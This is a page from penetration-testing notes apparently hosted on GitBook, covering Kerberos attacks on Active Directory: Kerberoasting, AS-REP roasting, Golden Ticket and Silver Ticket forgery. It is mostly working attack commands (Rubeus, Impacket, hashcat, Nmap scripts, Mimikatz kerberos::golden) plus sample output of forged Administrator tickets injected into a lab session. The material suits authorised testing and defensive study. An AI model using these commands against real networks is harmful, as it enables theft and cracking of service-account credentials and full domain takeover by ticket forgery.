Infrastructure penetration testing notes
  • Initial page
  • Table Of Content
  • Infrastructure testing
    • Enumeration
      • Packet Capture
      • Host Discovery
      • Services / Ports
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 53 - DNS
        • 67 - DHCP
        • 69 - TFTP
        • 79 - Finger
        • 88 - Kerberos
        • 111 - RPC
        • 113 - ident
        • 135 - MSRPC
        • 137 - Netbios
        • 139/445 - SMB
        • 161 - SNMP
        • 177 - XDMCP
        • 363 - LDAP
        • 443 - HTTPS
        • 500 - IKE (IPSEC)
        • 512/513/514 - R Services
        • 623 - IPMI
        • 873 - RSYNC
        • 1099 - Java RMI
        • 1433 - Microsoft SQL
        • 1521 - Oracle DB
        • 2049 - NFS
        • 3306 - MySQL
        • 3389 - RDP
        • 5432 - PostgresSQL
        • 5900 - VNC
        • 5985 - WinRM
        • 6000 - X11
        • 6379 - Redis
        • 8080 - Jenkins
        • 11211 - Memcached
        • RDS
        • SQLite
        • Docker
      • IPV6
        • Scanning
        • Enumeration
        • Transfering files
        • Pivoting and routes
        • THC IPv6
    • Gaining Access
      • IP Forwarding
      • VLAN Information
      • Psexec
      • Upgrading shell
      • Reverse Shells One-Liners
      • Bruteforce
      • MITM cleartext protocols
      • Null session
      • LLMNR / NBT NS Spoofing
      • Port knocking
      • Downloading/Transfer files
      • Remote Desktop
      • NAC Bypass
      • Pass-The-Hash
    • Exploitation
      • Solaris
      • IPv6
      • Windows
        • Compiling Code
        • SMB Vulnerabilities
        • Kerberos Attacks
    • Privilege Escalation
      • Situational Awareness
        • Linux
        • Windows
          • Registry
          • PowerView
          • FSMO Roles
      • Windows
        • Disable Apps and Firewall
        • Add user script
        • UAC Bypass
        • icacls
        • Running services
        • Common Exploits
      • Linux
        • SUID Shell script
        • CVE-2019-14287
        • Kernel exploit
      • Solaris
      • FreeBSD
      • Automated tools
      • Metasploit Modules
      • Password Dumping
    • Breakout
      • LOLBas
      • powershell constrained language byass
      • Alternatives to command prompt
      • Windows utilities
      • Applocker
      • Restricted shells
      • Environmental Variables / Bypassing Path Restrictions
      • Docker escape
      • Just Enough Administration (JEA)
    • Presistance
      • Windows
    • Pivoting
      • Adding routes
    • Password Cracking
      • Hashcat
      • John
      • Cisco Passwords
      • Passwords Lists
      • Generating wordlist
    • Tools
      • Nishang
      • UACME
      • Bypass-UAC
      • MSBuildAPICaller
      • Impacket
      • SharpPersist
      • Terminals
      • IP Calculation
      • pwsh
      • psTools / Sysinternals
      • Unlock applocker
      • enum4linux
      • Bloodhound
        • aclpwn
      • mitm6
      • Enyx
      • nfsshell
      • PowerUpSQL
      • Metasploit
        • msfvenom
    • Others
Powered by GitBook
On this page
  • Relationships and Attack paths
  • Kerberoasting
  • AS-RES
  • Golden Ticket
  • Silver Ticket

Was this helpful?

  1. Infrastructure testing
  2. Exploitation
  3. Windows

Kerberos Attacks

PreviousSMB VulnerabilitiesNextPrivilege Escalation

Last updated 4 years ago

Was this helpful?

Relationships and Attack paths

We can use to find hidden relationships and attack paths in an Active Directory environment.

From the data collect we can escalate our privilege to the target, or use tools like .

Kerberoasting

The module can be used to search for users with SPN

Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose Get-ADUser -LdapFilter "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" | Format-Table Name, DistinguishedNam

Using Nmap:

nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'

Using Rubeus to gain hashes:

Rubeus.exe kerberoast /outfile:hashes.txt

Use the hashcat -m 13100 (Kerberos 5 TGS-REP etype 23) to crack:

hashcat -a 0 -m 13100 SPN.hash /wordlists/rockyou.txt

Using impacket:

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

AS-RES

Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

To exploit run:

.\Rubeus.exe asreproast

Impacket:

# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Golden Ticket

Once you gained the krbtgt hash (from dcsync or DC compromise)T

The Mimikatz kerberos::golden module handles Golden Tickets

We need the following parameters:

  • /domain - name of the domain

  • /sid - the sid of the domain (can be obtain from 'whoami /user' , remember to remove the RID)

  • /rc4 - the NTLM hash of krbtgt

  • /user - the user you want to create the new TGT ticket for

  • /id - the RIF of that user you looking to create ticket for

  • /ptt - (Optional) inject the new ticket into the current session, if not applied the ticket will be saved to a file

mimikatz # kerberos::golden /domain:eth.lab /sid:S-1-5-21-98033113-2199257571-2188946577 /rc4:88a4507aae31297a2df7921b1430d781 /user:Administrator /id:500  /ptt
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 88a4507aae31297a2df7921b1430d781 - rc4_hmac_nt
Lifetime  : 06/04/2020 14:05:45 ; 04/04/2030 14:05:45 ; 04/04/2030 14:05:45
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session 

Silver Ticket

use the 'kerberos::golden' module to forge TGS, we will need to pass the following parameters:

  • /domain: The FDQN

  • /sid: The SID (Security Identifier) of the Domain (whoami /user)

  • /user: Target Account/Computer to Impersonate

  • /id: RID of the account you will be impersonating

  • /ptt: Optional ( will automatically inject the ticket into the current session)

  • /rc4: NTLM Hash of User Password/Computer Password

  • /service: the service we want to access

Example:

mimikatz # kerberos::golden /sid:S-1-5-21-98033113-2199257571-2188946577-500 /domain:eth.lab /ptt /id:500 /target:WIN-EU4DLP9KRRC.eth.lab /service:cifs /rc4:0c0d4252608be9131c2826a6feaf94b8 /user:Administrator
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577-500
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 0c0d4252608be9131c2826a6feaf94b8 - rc4_hmac_nt
Service   : cifs
Target    : WIN-EU4DLP9KRRC.eth.lab
Lifetime  : 03/04/2020 17:00:01 ; 01/04/2030 17:00:01 ; 01/04/2030 17:00:01
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session

Find users with pre-auth enabled using the module :

bloodhound
aclpwn
AD Powershell
https://newerasec.com/kerberoasting/
AD Powershell
https://newerasec.com/as-roast/